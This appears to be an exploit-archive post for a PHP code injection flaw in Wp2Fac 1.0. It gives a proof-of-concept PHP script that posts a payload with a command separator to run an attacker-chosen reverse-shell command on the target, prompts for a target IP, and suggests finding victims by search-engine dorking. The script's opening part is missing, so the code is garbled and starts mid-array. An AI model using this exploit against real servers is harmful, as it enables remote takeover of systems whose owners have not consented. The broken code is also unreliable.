============================================================================================================================================= | # Title : Wp2Fac 1.0 PHP COde Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) | | # Vendor : https://github.com/metinyesil/wp2fac | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: Send a POST request using PHP to execute commands on the target server. (Related : https://packetstorm.news/files/id/174555/ Related CVE numbers: ) . [+] save code as poc.php. [+] Usage: php script.php [+] PayLoad : "1234567890 & $revshell &;" ]; $options = [ "http" => [ "header" => implode("\r\n", $headers), "method" => "POST", "content" => http_build_query($data) ] ]; $context = stream_context_create($options); $response = file_get_contents($url, false, $context); return $response; } $host = readline("Target IP: "); $revshell = readline("Reverse Shell Command: "); echo "Check your listener!\n"; echo send_post_request($host, $revshell); ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================